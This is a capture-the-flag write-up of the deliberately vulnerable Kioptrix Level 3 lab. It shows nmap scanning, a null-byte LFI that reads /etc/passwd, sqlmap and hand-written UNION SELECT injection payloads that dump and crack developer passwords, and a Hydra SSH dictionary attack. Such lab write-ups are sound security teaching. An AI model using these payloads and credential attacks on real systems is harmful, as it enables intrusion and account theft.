menu

Kioptrix Level 3 Writeup

Kioptrix level 3 vulnerable machine from vulnhub.

Kioptrix level 3 vulnhub link below:
Kioptrix Level 3 download page

1. Enumeration


A port scan reveals that only SSH and HTTP is open.

nmap -T4 -sV -A -oA nmapscan 192.168.0.71
Nmap scan report for UNKNOWN (192.168.0.71)
Host is up (0.0051s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)


1.1 SSH

SSH appears to not have any vulnerable versions. However, SSH could possibly have weak credentials.

1.2.1 HTTP


Dirb and Nikto is run in the background to check for any interesting pages or vulnerabilities. Dirb reveals that there is an accessible phpmyadmin page. The page can be logged in using the username root and the password can be a random string. However, this did not really reveal anything and the default login has no privileges.

The login page reveals that it is powered by lotus.


Kioptrix level 3 lotus login

Using searchsploit, a vulnerability is found:
Kioptrix level 2 lotus vuln

This vulnerability is for remote command execution with metasploit. This can be used to get a meterpreter shell on the target. Finding this exploit was too easy. However there are several vulnerabilities on this machine.

1.2.2 HTTP - LFI


The URL appears to include files, this could possibly be vulnerable to LFI.

http://192.168.0.71/index.php?system=Blog

Using the following after system ../../../../../etc/passwd reveals nothing. However, with some research. The OWSAP ‘Testing for LFI page’ reveals that when using PHP, a null byte terminator at the end of the file will bypass it. When using the following:

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00jpg

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
...............
...............
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

This shows the passwd contents which can used for brute forcing SSH. loneferret and dreg can be used to perform a dictionary attack against them over SSH.

More info from OWASP here: OWASP LFI testing

1.2.3 HTTP - sqlmap (Easy SQL Injection)


When browsing the website, the gallery page has a button to filter by an ID. This appears to be a form of retrieving data from the SQL database. Using the ' at the end of the ID, an SQL error appears which is good news. The website is vulnerable to SQL. SQLmap is then used to check for the databases:

sqlmap -u http://192.168.0.71/gallery/gallery.php\?id\=">http://192.168.0.71/gallery/gallery.php\?id\= --dbs

available databases [3]:

gallery
information_schema
mysql


Three databases were revealed above. The gallery database could be the contents of the images and users of the gallery. The database gallery can searched next.

sqlmap -u http://192.168.0.71/gallery/gallery.php\?id\=">http://192.168.0.71/gallery/gallery.php\?id\= -D gallery --'tables'

Database: gallery
[7 tables]
+----------------------+
| `dev_accounts`       |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+


A table of dev_accounts is worth investigating, this could contain dev accounts.. duh.

sqlmap -u http://192.168.0.71/gallery/gallery.php\?id\=http://192.168.0.71/gallery/gallery.php\?id\= -D gallery -T dev_accounts --dump

Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+


The dev_accounts results contain 2 usernames and 2 hashes which were easily crackable with sqlmap.

1.2.4 HTTP - SQLI (without sqlmap)


Checking for the amount of columns by using ORDER BY.
id=2 union select 1,2,3,4,5,6

Finding the database and tables using UNION SELECT. This results in the database gallery being shown.
id=2 UNION SELECT 1, table_schema, table_name,4,5,6 FROM information_schema.tables--

Searching inside the database gallery:
id=1 UNION SELECT 1, table_name,3,4,5,6 FROM information_schema.tables WHERE table_schema = 'gallery'#

The gallery table shows the dev_accouns table. The dev_accounts can then be searched for the columns.
id=1 UNION SELECT 1, column_name,3,4,5,6 FROM information_schema.columns WHERE table_name = 'dev_accounts'#

The columns reveal the 2 user accounts and there corresponding hashes. The hashes can then be cracked with john the ripper.

2.1 Exploitation - SSH


The credentials fetched from the LFI attack can be run against a dictionary.

hydra -t 6 -l loneferret -P 10k-most-common.txt 192.168.0.71 ssh
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10000 login tries (l:1/p:10000), ~2500 tries per task
[DATA] attacking ssh://192.168.0.71:22/
[STATUS] 52.00 tries/min, 52 tries in 00:01h, 9948 to do in 03:12h, 4 active
[22][ssh] host: 192.168.0.71   login: loneferret   password: starwars
1 of 1 target successfully completed, 1 valid password found


The dictionary attack with Hydra above was successful and the password was revealed as starwars. When attempting to login to SSH with this username and password it is successful. When browsing files i found a configuration file in the gallery directory which contains the mysql login which is root and the password is fuckeyou. This gives us full root access to the database.

Pwned!